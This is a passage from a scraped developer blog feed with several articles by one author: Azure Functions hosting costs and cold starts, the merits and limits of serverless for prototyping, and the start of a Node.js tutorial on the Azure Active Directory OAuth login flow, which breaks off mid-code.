That means for us: All functions in a single function app live and scale together, and if you have a function that is called once a month and one that is called 50 times a second, both of them will have to be deployed and initialized together in each scaling step. &lt;br&gt;
So to optimize scalability, we can split our functions into "high-demand" functions and "just-sometimes" functions. Again, the additional time it takes Azure Functions to mount a few additional functions onto a VM won't make a difference - but if we're talking about dozens of functions, it might. And on the other hand, functions which are often called together should be kept in the same deployment - this way you save a lot of networking overhead.&lt;/p&gt;

&lt;h2&gt;
  
  
  Services besides your functions
&lt;/h2&gt;

&lt;p&gt;If you're developing a web app, you will most likely have a front-end that shows HTML and loads a lot of scripts and static files. As we have already learned, Azure Functions always takes your whole codebase and shifts it onto an available VM. What happens if a gigabyte of images has to be moved? Exactly, the startup time of your Functions App gets tremendously slower. &lt;br&gt;
So it is advisable to outsource as many bits and bytes as possible - and this is where Azure Storage kicks in. With Azure (Blob) Storage you can store all your static files outside of your Functions App, where they are always available and don't block the scaling of your web application, while also being optimized for high-frequency delivery (think of CDNs and the like; you have those options with Blob Storage, but not if all your files are baked into your app). Plus, they are easily interchangeable, and your app doesn't have to be redeployed every time you alter a picture.&lt;/p&gt;

&lt;p&gt;And we have a second storage issue: how do we persist dynamic data (like user input)? We need some kind of database to store all of that, and databases need VMs, and VMs cost a lot of money per month, and we don't have money, so is bankruptcy inevitable after all? Again, Azure Storage to the rescue. Azure Table Storage provides a very cheap "pseudo-SQL" database where you can store all kinds of data. I call it pseudo-SQL because it takes objects of key-value pairs and flattens them all into one big table where every distinct key that exists in at least one object gets a column. And it doesn't offer a rich query language, so you are mostly limited to storing and retrieving data. As long as you create tables whose entities share some sort of meaning, you're good to go (for a start).&lt;br&gt;
And the best thing: the APIs for Table Storage and Cosmos DB (Azure's high-performance database) are exactly the same, so if advanced queries, analytics and answers in the single-digit milliseconds ever become a thing at your organization, having all that is only a parameter away.&lt;/p&gt;
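&lt;p&gt;To make that "flattening" behavior concrete, here is a small plain-JavaScript sketch (no Azure SDK involved, and the sample entities are made up) of how key-value objects end up in one wide table where every distinct key becomes a column:&lt;/p&gt;

```javascript
// Sketch: how Table Storage-style flattening turns heterogeneous
// key-value objects into one wide table. Every distinct key that
// appears in at least one entity becomes a column.
function flattenEntities(entities) {
  const columns = new Set();
  for (const entity of entities) {
    for (const key of Object.keys(entity)) columns.add(key);
  }
  // Build rows: keys an entity lacks simply stay empty (null).
  const header = Array.from(columns);
  const rows = entities.map(function (entity) {
    return header.map(function (col) {
      return col in entity ? entity[col] : null;
    });
  });
  return { header, rows };
}

const { header, rows } = flattenEntities([
  { id: 1, name: "Alice" },
  { id: 2, name: "Bob", avatarUrl: "img/bob.png" },
]);
console.log(header); // every distinct key became a column
console.log(rows);
```

&lt;p&gt;Entities that lack a key get an empty cell in that column, which is exactly why tables whose entities share some meaning stay manageable.&lt;/p&gt;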

&lt;p&gt;Are we done with theory now? Yes. You can finally start developing your own Azure Functions driven web app. I would recommend the following structure for your project: you will need one function for every page you want to display to the customer (e.g. yourdomain/ and yourdomain/about), where you render the page and send the final file to the user (which is also a great way to monitor your traffic and latency per page). And you will of course need one function for every API endpoint that you provide (e.g. GET yourdomain/api/user, POST yourdomain/api/user, …). If you only have simple CRUD operations on your database, I would leave it at this setup. &lt;br&gt;
If, however, you want to run more complex calculations that involve parallel computing (e.g. "for every item in my array, do something wildly complex"), you could split up your functions API further. If you have long-running orchestration functions that have to wait for other functions, familiarize yourself with durable functions. &lt;br&gt;
Whenever these orchestration functions trigger another function, they go to sleep and wake up when all "sub-"functions are done executing. This way, you only pay for the functions that are actively doing work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Architecture done, but why does my app get horribly slow sometimes?
&lt;/h2&gt;

&lt;p&gt;Remember the whole "spin up a new VM and deploy my code to it" process? This is called the startup of your Functions App, and it's one of the main principles of serverless computing (only run your code when it is really needed). &lt;br&gt;
Your app transitions from a "cold" state (meaning it isn't deployed) to a "hot" state (meaning it is deployed and ready to serve requests immediately). The Azure developers are constantly optimizing this process, but at the time of writing it can still take up to ten seconds until your app responds. After receiving a call and bringing your app into a hot state, Azure Functions keeps it hot for five minutes (again, at the time of writing). Whenever it receives a new call, the five-minute clock starts ticking again. After that, it clears your code from the VM and sends your app back into the cold state. &lt;br&gt;
So theoretically you would need at least one user every five minutes to keep your app alive, which will probably not always be the case. &lt;/p&gt;

&lt;p&gt;But there is an (unofficial) trick to simulate this effect: there are so-called timer trigger functions which execute on a fixed schedule. If you add one of these to your project and set it to execute every 4 minutes 30 seconds (it doesn't matter what the function does; just let it log a character or something like that), you have activity in your app that keeps it constantly in a hot state. &lt;br&gt;
And as Functions is optimized to be cheap for a huge number of small compute activities, the roughly 9.000 calls per month that you "waste" cost you absolutely nothing (the first million calls per month in a Function App are free). This way you always keep one VM occupied with your code and have your system up and running at all times.&lt;/p&gt;

&lt;h2&gt;
  
  
  Do I have to ping an .azuresomething URL now?
&lt;/h2&gt;

&lt;p&gt;As you have surely noticed, Functions provides you with a standard URL from which you can call your service. This URL usually has the form &lt;em&gt;your Functions App&lt;/em&gt;.azurewebsites.net and is quite impractical if actual customers are supposed to engage with it (but at least it's HTTPS-enabled by default, so you've got that going for you). &lt;br&gt;
If you want to release your application, you will most likely want to bring in a custom domain under which your app is reachable. With Azure Functions you can do that in just a few clicks: Functions Apps are just basic Web Apps in Azure and can be configured in exactly the same way. To access the Web App settings, click on "Platform Features" on the start page of your Functions App and you're good to go. See &lt;a href="https://docs.microsoft.com/en-us/azure/app-service/app-service-web-tutorial-custom-domain"&gt;this documentation&lt;/a&gt; on how to add your custom domain.&lt;/p&gt;

&lt;p&gt;And it gets even better. Usually when you host something under your own domain, you don't have an SSL certificate to enable HTTPS communication. This means that all of your users will most likely see a warning stating that your site is insecure and should not be trusted. With Azure Web Apps you have the possibility to configure a Let's Encrypt plugin that automatically creates and renews SSL certificates for your custom domain. To do this, just follow &lt;a href="https://www.hanselman.com/blog/SecuringAnAzureAppServiceWebsiteUnderSSLInMinutesWithLetsEncrypt.aspx"&gt;this article&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Great, but let's get down to business. How much will it cost?
&lt;/h2&gt;

&lt;p&gt;(Before we start: all pricing details reference the West Europe datacenter, are given in euros and were taken in March 2019.) Remember that our application has three parts: a Functions App for the logic, and an Azure Storage account with a Blob Storage and a Table Storage to host our website files and our data. So let's break down the individual components:&lt;/p&gt;

&lt;h3&gt;
  
  
  Calculating cost for the Functions App
&lt;/h3&gt;

&lt;p&gt;The Functions App is meant to support large concurrent workloads. It also offers a very generous free grant of 1.000.000 API hits and 400.000 GB-seconds per month.&lt;/p&gt;

&lt;p&gt;Wait, what are GB-seconds? Besides tracking how often your APIs are hit, Azure Functions also meters the RAM consumption of your application: for every second that your app is running, its memory footprint is measured. Observed memory is rounded up in 128 MB increments, so an app using a full 1 GB of RAM for one second is charged one GB-s, and one using 1.3 GB in that second is charged roughly 1.4 GB-s (keep that in mind when implementing compute-intensive functions). &lt;br&gt;
Thanks to the free grant, a single function running non-stop at the minimum metered 128 MB would consume roughly 324.000 GB-s in a 30-day month and still stay within the free 400.000 GB-s, so modest always-on activity costs you nothing. And remember, Functions only charges while your function is actually executing; idle time in the hot state is completely free of charge. &lt;br&gt;
Some more technical details about this metric: metering starts at a minimum of 128 MB, and one function in the Consumption plan can use a maximum of 1.536 MB of RAM.&lt;/p&gt;
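&lt;p&gt;The metering rule can be sketched in a few lines (assuming the 128 MB rounding granularity described above):&lt;/p&gt;

```javascript
// Sketch of Azure Functions consumption metering: observed memory is
// rounded up in 128 MB increments (minimum 128 MB), then multiplied by
// execution time in seconds to get GB-seconds.
const MB_PER_INCREMENT = 128;

function gbSeconds(observedGb, seconds) {
  const mb = Math.max(observedGb * 1024, MB_PER_INCREMENT);
  const roundedGb = (Math.ceil(mb / MB_PER_INCREMENT) * MB_PER_INCREMENT) / 1024;
  return roundedGb * seconds;
}

console.log(gbSeconds(1.0, 1)); // 1 GB for one second: 1 GB-s
console.log(gbSeconds(1.3, 2)); // rounds up to 1.375 GB, times two seconds: 2.75 GB-s
```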

&lt;p&gt;Although compute cost is the one that kicks in earlier, there is still a second metric, so let's look at API hits.&lt;br&gt;
As you might remember, we use a timer trigger function every 4 minutes 30 seconds to keep our app alive. That adds up to roughly 9.000 calls a month, leaving 991.000 free calls. If we assume a typical user of your app checks in twice a day, every day of the week, and triggers 50 function calls per session (page loads and interactions with the API like creating and deleting elements), you could support about 354 monthly active users within the free grant.&lt;/p&gt;

&lt;p&gt;But what happens when you exceed your free budget? Is that when the price trap finally snaps shut? Not really.&lt;/p&gt;

&lt;p&gt;Let's calculate with 500 active users for your app. Using the scenario described above, these users would trigger 1.400.000 function calls each month, so we would pay 0.17€ for an additional million function executions. We also have to pay for 1.000.000 additional GB-s, which costs us 14€. For 500 active users in our system, this leaves us with 14.17€ of hosting cost: not even 3 cents per user!&lt;/p&gt;

&lt;p&gt;As we scale up, the cost per user stays roughly the same: supporting 1.000 users in our scenario would cost 34.11€, which is 3.4 cents per user; 10.000 users would cost us 390.97€, roughly 4 cents per user; and 100.000 users would be 3961.55€, again roughly 4 cents per user.&lt;/p&gt;
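&lt;p&gt;For a rough sanity check of such numbers, here is a small estimator using the March-2019 prices from this section (0.17€ per million executions and 14€ per million GB-s beyond the free grant). It pro-rates partial millions linearly, whereas the figures above round up to full millions, so the results differ slightly; both prices are assumptions to re-check against current pricing:&lt;/p&gt;

```javascript
// Rough monthly cost estimator for a Consumption-plan Functions App.
// Prices are the March-2019 figures from the text and will be outdated.
const FREE_CALLS = 1000000;
const FREE_GBS = 400000;
const PRICE_PER_MILLION_CALLS = 0.17; // EUR
const PRICE_PER_MILLION_GBS = 14; // EUR

function monthlyFunctionsCost(calls, gbs) {
  const paidCalls = Math.max(calls - FREE_CALLS, 0);
  const paidGbs = Math.max(gbs - FREE_GBS, 0);
  return (
    (paidCalls / 1000000) * PRICE_PER_MILLION_CALLS +
    (paidGbs / 1000000) * PRICE_PER_MILLION_GBS
  );
}

// Inside the free grant, the bill stays at zero:
console.log(monthlyFunctionsCost(900000, 350000)); // 0
```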

&lt;h3&gt;
  
  
  Calculating storage cost
&lt;/h3&gt;

&lt;p&gt;But don't forget: we're not done yet. There is still the storage. Remember, we had two parts in there: a Blob Storage for static files and a Table Storage for persistent data. Both have the same pricing model: you pay for the amount of data you've stored (per GB) and for the CRUD transactions you perform on that data (per 10.000 operations).&lt;br&gt;
For the Blob Storage, you pay 0.0166€ per GB per month (in the "hot", meaning very fast, access tier), as well as 0.004€ per 10.000 read operations and 0.0456€ per 10.000 write operations. &lt;br&gt;
Let's say we have 4 pages, each loading 15 static assets, that our whole frontend asset base is 100 MB in size, and that we redeploy it four times a month. An average user visits all 4 pages per session and has the option to upload a profile picture, which they of course do. Assume an unoptimized 4K profile picture is 3.5 MB. The picture is loaded on every page change and re-uploaded once a month. &lt;br&gt;
With these assumptions, and 500 users browsing our site twice a day, we get: 0.3€ for hosting roughly 2 GB of assets, 0.07€ for page loads and 0.02€ for redeploying our frontend and storing the profile pictures, adding up to 0.39€ for file storage.&lt;/p&gt;

&lt;p&gt;Azure Table Storage has the same metrics, yet different prices: you pay 0.0591€ per GB of data (in locally redundant storage, which should be enough for our case) as well as 0.000304€ per 10.000 transactions, regardless of their type. Let's say we host a user database where every entry holds 0.5 kB of data (that's roughly 10 columns of 15-character strings) and is changed once a month. Furthermore, we log everything our users do at 0.05 kB per log entry. We also have four tables where a user on average stores a hundred elements of 1 kB each and reads all their entries once per session (imagine a to-do list or something like that). Adding that up for our 500 users: we'll pay 0.18€ for 3 GB of data storage as well as 1.97€ for over 64.3 million transactions per month, 2.15€ in database costs overall.&lt;/p&gt;

&lt;p&gt;Let's put that all together: we've built a killer app and managed to convert 500 users to daily usage. Per month we're paying 14.17€ for compute, 2.15€ for hosting and maintaining our data and 0.39€ for storing our static files. That adds up to 16.71€ per month in IT infrastructure costs, or 0.034€ per user in our system. So for roughly the price of a Netflix family subscription you can bring value to 500 users through your Functions app. And best of all: since the app is built for scalability, usage growth and costs scale linearly, making it really easy to calculate your own pricing.&lt;/p&gt;

&lt;h2&gt;
  
  
  That is awesome!
&lt;/h2&gt;

&lt;p&gt;I know, I was thinking just the same when deciding to write this article. But please keep in mind: this approach is meant for when you're starting out with your product. You will always have limitations that sooner or later become a bottleneck in your IT organization, and if you don't shift your hosting approach soon enough you'll end up building a lot of technical debt. Here are the most striking limitations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You have a RAM limit of 1.5 GB per function in the Consumption plan, meaning RAM-intensive processes like rendering, complex image processing or AI are hard to implement and in any case very slow in execution. &lt;/li&gt;
&lt;li&gt;Your Functions App is very good at scaling, which makes you vulnerable to DDoS attacks: an attack that scales your app up also scales your bill. You can mitigate that risk by putting your app behind an (Azure) firewall (and Azure keeps an eye out for you by default as well). &lt;/li&gt;
&lt;li&gt;Your attack surface increases significantly, as you have to protect dozens or hundreds of small functions. You have to validate input, output, access rights and more in every function you write.&lt;/li&gt;
&lt;li&gt;Though Azure Functions scales really well, it doesn't scale infinitely. Right now, a maximum of 10 VMs can be occupied by your Functions App in the Consumption plan, and these VMs only offer a fixed amount of RAM, meaning there is a hard cap on how much workload a Functions App can handle.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;As already said, these are all risks that can be partially mitigated or worked around, but only at the cost of bending your code base into something it isn't meant for.&lt;br&gt;
Despite all the downsides and grumpiness at the end, I hope this article gives you a good introduction to quickly setting up a scalable, reliable and cheap service that you can use to kick-start your product.&lt;/p&gt;

</description>
      <category>serverless</category>
      <category>azure</category>
      <category>prototyping</category>
      <category>startup</category>
    </item>
    <item>
      <title>Why serverless is awesome for prototyping</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sat, 19 Oct 2019 09:53:24 +0000</pubDate>
      <link>https://forem.com/urmade/why-serverless-is-awesome-for-prototyping-46k6</link>
      <guid>https://forem.com/urmade/why-serverless-is-awesome-for-prototyping-46k6</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--yctXtMnz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1600/1%2AmzkwdYC7tbRk-RNSMOaZ-w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--yctXtMnz--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/1600/1%2AmzkwdYC7tbRk-RNSMOaZ-w.png" alt="Cost comparison between serverless and traditional computing" width="880" height="672"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With the rise of cloud computing, new ways of hosting emerged, putting on-demand compute power instead of hardware limitations at the center of every organization's IT department. What started with virtual machines that could be spun up and shut down in minutes to optimize costs has evolved into many new technologies that are now de-facto standards in an ever-growing number of organizations. Applications became "cloud native" and organizations were "cloud born" - and if you really managed to dodge these buzzwords until now, I recommend reading &lt;a href="https://www.infoworld.com/article/3281046/what-is-cloud-native-the-modern-way-to-develop-software.html"&gt;this article&lt;/a&gt; to catch up on what modern IT infrastructure is all about.&lt;/p&gt;

&lt;h2&gt;
  
  
  Breaking systems down with Microservices
&lt;/h2&gt;

&lt;p&gt;These innovations all had similar goals in mind: make your infrastructure more flexible and at the same time more robust while minimizing your costs (remember, in the new world it's all about variable compute power instead of fixed-price hardware). Technologies like Docker and Kubernetes arose which made splitting your application into small building blocks a real thing (this is called microservices, another buzzword that you can read more about &lt;a href="https://www.nginx.com/learn/microservices/"&gt;here&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;The basic idea behind this: instead of having one app where every line of code references every other line of code (this is called tight coupling), build multiple modules with well-defined interfaces that other modules can use (which leads to loose coupling, and to high cohesion within each module). This way, you are more flexible in the way you build your application (you may for example want to build your app's front-end in Node and the high-performance calculation in Go) and in the way you scale it (in the same example, the front-end may just need to forward user input, so 2 GB of RAM on one or two machines could be enough, whereas your calculation engine may need 32 GB of RAM and should scale to 8 machines under high traffic). &lt;/p&gt;

&lt;h2&gt;
  
  
  Going even smaller with Nanoservices
&lt;/h2&gt;

&lt;p&gt;And you can spin that idea even further: after microservices followed nanoservices, with the idea that every deployment in your architecture should do exactly one single thing and be separated into its own code package. What sounds like the ultimate mess for every IT admin (and you're not wrong, it has its drawbacks) enables completely new levels of scalability and development flexibility.&lt;/p&gt;

&lt;p&gt;This is where so-called serverless computing shines: if all your workload is split into tiny packages, compute power becomes nearly irrelevant (a single function usually doesn't need much of it) and flexibility becomes the top priority. And this is what, for example, Azure Functions or AWS Lambda promise: you write single, distinct functions that can be called by other services via API and upload the code to the cloud, and the cloud provider deploys your code "just in time" when it is called by another service. You as a developer only pay for the time your code execution took and for how many times your function was called (usually priced at a few cents per million calls).&lt;/p&gt;

&lt;p&gt;This leaves us with two exciting things: We have a cheap service to host our application, and we have a lot of scalability that only charges us for how frequently our app is used. This is great for Start-Ups or prototypes where you don't want to overspend on infrastructure, where you usually don't have highly complex logic in your application and where you yet don't know how heavily your app will be utilized.&lt;/p&gt;

&lt;h2&gt;
  
  
  Serverless on everything ... right?
&lt;/h2&gt;

&lt;p&gt;Of course, not everything is perfect in the serverless world, and it will probably not solve all the problems you ever had with hardware management. The most striking argument against serverless computing comes from its core development idiom: by having thousands of standalone functions in your architecture, you create a huge latency overhead just for routing traffic through your systems. Even if you put all your services into one datacenter, you still have to route traffic within that datacenter, and if a request visits 20-50 stops before it is successfully finished, this latency becomes significant for your response time.&lt;/p&gt;

&lt;p&gt;Most cloud providers also usually offer only standardized VMs on which you can run your functions. For you, that means there is a cap on how many resources one function can consume. Although this shouldn't be an issue for most of your logic, you will have to look for alternatives when it comes to compute-heavy jobs like image transformation or AI calculations. &lt;/p&gt;

&lt;p&gt;One additional thing to consider when going serverless: your attack surface multiplies. A lot. You have to secure every single function, and every function on its own is responsible for validating access control, inputs and outputs. Most providers offer easy and compute-saving methods to handle the authentication part, but you still have to take care of securing every single function in your architecture.&lt;/p&gt;

&lt;p&gt;And as hard as you try, you will almost never end up completely serverless. Think about the following scenario: one of your functions sends out notifications to all of your users' mobile devices. This triggers around a million function calls, as your app has already become quite popular. Absolutely no problem: serverless will handle everything for you, and a few seconds later all is done (probably for just a few cents for all messages together). But these functions have one additional job: for logging purposes, each one writes a statement to a SQL database. If you have never worked with SQL databases: shooting a million concurrent requests at one is a &lt;em&gt;really&lt;/em&gt; bad idea. &lt;br&gt;
So you will have to keep the big picture in mind and design your architecture around its weakest link. The best individual scalability won't help you at all if one bottleneck keeps the overall process slow. And as a note before you ditch logging forever: the large cloud providers already offer serverless databases that you can hammer as much as you want.&lt;/p&gt;
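&lt;p&gt;One common way around such a bottleneck is to buffer the writes and flush them in batches instead of firing them concurrently. A minimal sketch in plain JavaScript, where the &lt;code&gt;writeBatch&lt;/code&gt; callback is a stand-in for whatever bulk-insert call your database client offers:&lt;/p&gt;

```javascript
// Sketch: collapse a flood of individual writes into fixed-size batches,
// so the downstream store sees a handful of bulk requests instead of a
// million concurrent single-row inserts.
function toBatches(items, batchSize) {
  const batches = [];
  for (let i = 0; items.length > i; i += batchSize) {
    batches.push(items.slice(i, i + batchSize));
  }
  return batches;
}

async function flushLogs(logEntries, writeBatch, batchSize = 100) {
  // Sequential bulk writes: the database sees one request per batch.
  for (const batch of toBatches(logEntries, batchSize)) {
    await writeBatch(batch);
  }
}

// Usage with a stand-in writer that just counts requests:
let requests = 0;
const entries = Array.from({ length: 1000 }, (_, i) => ({ id: i }));
flushLogs(entries, async () => { requests += 1; })
  .then(() => console.log(requests)); // 10 bulk requests for 1000 entries
```

&lt;p&gt;In practice you would put a queue in front of the writer, but the principle is the same: the weakest link dictates the pace, so feed it at a pace it can handle.&lt;/p&gt;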

&lt;h2&gt;
  
  
  So when do I use serverless?
&lt;/h2&gt;

&lt;p&gt;Serverless functions have a lot of great use cases. If you have an app idea and want to test it quickly and get started fast, serverless is a great way to achieve this. You don't have any fixed hardware cost, your app can scale no matter how many people use it, and you are nudged into a &lt;a href="https://www.freecodecamp.org/news/a-quick-intro-to-dependency-injection-what-it-is-and-when-to-use-it-7578c84fa88f/"&gt;dependency injection&lt;/a&gt; programming pattern, which in the worst case leaves you with a well-structured monolith if you decide to switch to traditional development. And the most striking point still is: you can basically develop your service for free. Most cloud providers offer the first million calls to a function per month for free, which is more than enough to get you started. From here, you can start promoting your app and acquiring users. And as you do, your bill scales proportionally with your users, giving you the chance to grow with their demand (and probably with your income from new, paying users).&lt;/p&gt;

&lt;p&gt;Serverless is also a go-to choice for all kinds of proxies, helper functions and small handlers. If you want to pipe a request from one service to another (e.g. from a queue to a database), serverless has you covered. You can even automate your IT infrastructure with functions: just write the REST calls to start / stop / administrate your services as serverless functions, and define protocols for which operations should be applied in which situation. And there you go: a fully automated IT infrastructure right at your fingertips. &lt;/p&gt;

&lt;p&gt;Have you ever worked with serverless functions? What did you like, what were your pitfalls?&lt;/p&gt;

</description>
      <category>serverless</category>
      <category>cloud</category>
      <category>devops</category>
      <category>architecture</category>
    </item>
    <item>
      <title>The (hands-on) beginners guide to Azure Active Directory</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Thu, 17 Oct 2019 17:44:07 +0000</pubDate>
      <link>https://forem.com/urmade/the-hands-on-beginners-guide-to-azure-active-directory-4ija</link>
      <guid>https://forem.com/urmade/the-hands-on-beginners-guide-to-azure-active-directory-4ija</guid>
      <description>&lt;p&gt;This article aims to give you a reference implementation of how you can log in your users using their existing Azure Active Directory accounts. Are you curious what Azure Active Directory (AAD) is in the first place? Then check out &lt;a href="https://dev.to/urmade/the-theoretical-beginners-guide-to-azure-active-directory-1f5m"&gt;this article&lt;/a&gt; that walks you through the theoretical foundations of AAD.&lt;/p&gt;

&lt;p&gt;You can find the final code of this tutorial &lt;a href="https://github.com/Urmade/AzureActiveDirectoryNodeJSLogin"&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we're building
&lt;/h2&gt;

&lt;p&gt;Azure Active Directory is built on industry-standard identity specifications and supports OpenID Connect for modern authentication and authorization. This tutorial will walk you through the OAuth 2.0 authorization code flow, which consists of two basic steps:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;First, you have to redirect your user to a Microsoft hosted login page. Microsoft takes care of receiving, handling and validating user credentials, so you don't have to care about any of that.&lt;/li&gt;
&lt;li&gt;In the second step, Azure Active Directory will send an authorization code to our web server. We take this code and trade it for a JWT token, which then can be used to authorize calls to other Microsoft services like Microsoft Graph, AAD and more.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Getting started
&lt;/h2&gt;

&lt;p&gt;As a prerequisite for this tutorial we need some kind of server environment to run our code; in this case we choose Node.js. The first thing to do is to set up the server:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;const express = require("express");&lt;br&gt;
const app = express();&lt;br&gt;
const request = require("request");&lt;br&gt;
require("dotenv").config();&lt;br&gt;
//Here goes our code&lt;br&gt;
app.listen(8080);&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;In our first step we have to log in our user and receive a code string that we can trade in for a Bearer token. This tutorial assumes that you have already registered an app in Azure Active Directory, a manual for that can be found &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app"&gt;here&lt;/a&gt;. To get the code we have to redirect our user to the Microsoft login page (where they then log in with their credentials).&lt;/p&gt;

&lt;p&gt;&lt;code&gt;app.get("/login", (req, res) =&amp;gt; {&lt;br&gt;
res.redirect(&lt;br&gt;
"https://login.microsoftonline.com/" + process.env.TENANT_ID + "/oauth2/v2.0/authorize?" +&lt;br&gt;
"client_id=" + process.env.CLIENT_ID +&lt;br&gt;
"&amp;amp;response_type=code" +&lt;br&gt;
"&amp;amp;redirect_uri=" + process.env.BASE_URL + process.env.REDIRECT_URL +&lt;br&gt;
"&amp;amp;response_mode=query" +&lt;br&gt;
"&amp;amp;state= " +&lt;br&gt;
"&amp;amp;scope=" + process.env.SCOPE&lt;br&gt;
);&lt;br&gt;
})&lt;/code&gt;&lt;/p&gt;
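&lt;p&gt;As an alternative to hand-concatenating the query string, the same authorize URL can be assembled with Node's built-in URL and URLSearchParams, which percent-encode every value for you. A sketch with placeholder values standing in for the process.env variables above:&lt;/p&gt;

```javascript
// Sketch: building the authorize URL with URL/URLSearchParams instead of
// string concatenation, so every parameter is percent-encoded correctly.
// The concrete values below are placeholders, not real credentials.
function buildAuthorizeUrl(cfg) {
  const url = new URL(`https://login.microsoftonline.com/${cfg.tenant}/oauth2/v2.0/authorize`);
  url.searchParams.set("client_id", cfg.clientId);
  url.searchParams.set("response_type", "code");
  url.searchParams.set("redirect_uri", cfg.redirectUri);
  url.searchParams.set("response_mode", "query");
  url.searchParams.set("state", cfg.state || "");
  url.searchParams.set("scope", cfg.scope);
  return url.toString();
}

const authorizeUrl = buildAuthorizeUrl({
  tenant: "common",
  clientId: "00000000-0000-0000-0000-000000000000",
  redirectUri: "http://localhost:8080/callback",
  scope: "openid profile User.Read",
});
console.log(authorizeUrl);
```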

&lt;p&gt;There are a lot of parameters in this URL, so let's walk through them one by one:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;The base url&lt;/code&gt;: We need to call &lt;a href="https://login.microsoftonline.com/*tenant*/oauth2/v2.0/authorize"&gt;https://login.microsoftonline.com/*tenant*/oauth2/v2.0/authorize&lt;/a&gt; to enter our user data. The tenant can be either only our own tenant (e.g. myTenant.onmicrosoft.com) or &lt;code&gt;common&lt;/code&gt;, which means every account that is part of some Active Directory tenant (e.g. thatOtherTenant.onmicrosoft.com) can log into our app. We further specify that we want to use version 2.0 of the REST API (you can find the differences between v1.0 and v2.0 &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/azure-ad-endpoint-comparison"&gt;here&lt;/a&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;client_id&lt;/code&gt;: The id of your app that is registered in your AAD tenant&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;response_type&lt;/code&gt;: Specifies what Active Directory will return after a successful login action. For the OAuth 2.0 flow we always use &lt;code&gt;code&lt;/code&gt; to receive the code we can trade for a Bearer token, in the OpenIdConnect flow we would have to use the value id_token.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;redirect_uri&lt;/code&gt;: The url to which AAD will redirect the user when they successfully logged in. This url has to be specified in the app registration and your parameter must match this specified url exactly (including the path, so if you specify &lt;a href="http://www.myapp.com"&gt;www.myapp.com&lt;/a&gt; as a redirect url in Active Directory and &lt;a href="http://www.myapp.com/callback"&gt;www.myapp.com/callback&lt;/a&gt; in your query parameters, the authentication will fail).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;response_mode&lt;/code&gt;: This parameter determines how our access code will be sent back to our app. It can have the values &lt;code&gt;query&lt;/code&gt;, &lt;code&gt;form_post&lt;/code&gt; and &lt;code&gt;fragment&lt;/code&gt;. In our case where we actually redirect the user we can use the query parameter, if we would for example open a pop-up for the user we could also use the form_post to post the code to our app.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;state&lt;/code&gt;: Here you can enter any string you wish. This can be used as a challenge for security reasons or if you want to store some information the user gives to you at the beginning of the authentication flow and that should be given back at the end of the flow.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;scope&lt;/code&gt;: The scopes are the permissions your users will have when they want to call any Microsoft services with the bearer token they receive. You can read more about scopes &lt;a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/consent-framework"&gt;here&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Furthermore there are optional parameters that you can use (if applicable):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;prompt&lt;/code&gt;: Here you can specify what the user will see when they try to log into your app. By default, Active Directory signs your users in, stores a cookie on their device and, for every further authorization, logs the user in silently without showing an additional prompt. With the values &lt;code&gt;login&lt;/code&gt;, &lt;code&gt;consent&lt;/code&gt; and &lt;code&gt;none&lt;/code&gt; you can specify that the user always sees the login form, always has to give consent to the app before using it, or never sees any form.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;login_hint&lt;/code&gt;: If you already know the email address or user name that your user will take to log in, you can pre-fill this input field in the login mask with the login_hint parameter.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;domain_hint&lt;/code&gt;: As already stated the Azure AD v2.0 endpoint supports login from consumers (private accounts) and organizations likewise. With this parameter you can specify if only organizations or only consumers can log into your app by giving it the value &lt;code&gt;consumers&lt;/code&gt; or &lt;code&gt;organizations&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When our user now logs into the application successfully, our redirect_uri will be called in the format &lt;code&gt;redirect_uri?code=…&lt;/code&gt;. We can listen on that path from our server and directly trade the code in for a token. To do this, we have to send a POST request to Azure AD, and we have to implement what to do with the token once we receive it.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;app.get(process.env.REDIRECT_URL, (req, res) =&amp;gt; {&lt;br&gt;
const authCode = req.query.code;&lt;br&gt;
if (!authCode) {&lt;br&gt;
res.status(500).send("There was no authorization code provided in the query. No Bearer token can be requested");&lt;br&gt;
return;&lt;br&gt;
}&lt;br&gt;
const options = {&lt;br&gt;
method: "POST",&lt;br&gt;
url: "https://login.microsoftonline.com/" + process.env.TENANT_ID + "/oauth2/v2.0/token",&lt;br&gt;
form: {&lt;br&gt;
